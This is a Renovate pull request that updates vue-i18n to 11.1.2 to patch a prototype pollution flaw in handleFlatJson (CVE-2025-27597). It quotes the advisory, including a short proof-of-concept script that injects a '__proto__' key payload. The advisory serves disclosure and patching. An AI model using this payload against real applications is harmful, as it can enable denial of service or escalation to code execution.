fix(deps): update dependency vue-i18n to v11.1.2 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vue-i18n (source)	11.1.0 -> 11.1.2

GitHub Vulnerability Alerts

CVE-2025-27597

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@​intlify/message-resolver/index.js

# v9.2 or later
node_modules/@​intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @​intlify/[email protected]
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

// poc.js
(async () => {
    const lib = await import('@​intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

---

Release Notes

intlify/vue-i18n (vue-i18n)

v11.1.2

Compare Source

What's Changed

🔒 Security Fixes

• fix: prototype pollution in handleFlatJson, about details see GHSA-p2ph-7g93-hw3m

Full Changelog: intlify/vue-i18n@v11.1.1...v11.1.2

v11.1.1

Compare Source

Full Changelog: intlify/vue-i18n@v11.1.0...v11.1.1

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[cloudflare-workers-and-pages]

Deploying piped with    Cloudflare Pages

Latest commit:	0bd79b3
Status:	✅  Deploy successful!
Preview URL:	https://19508500.piped.pages.dev
Branch Preview URL:	https://renovate-npm-vue-i18n-vulner.piped.pages.dev

View logs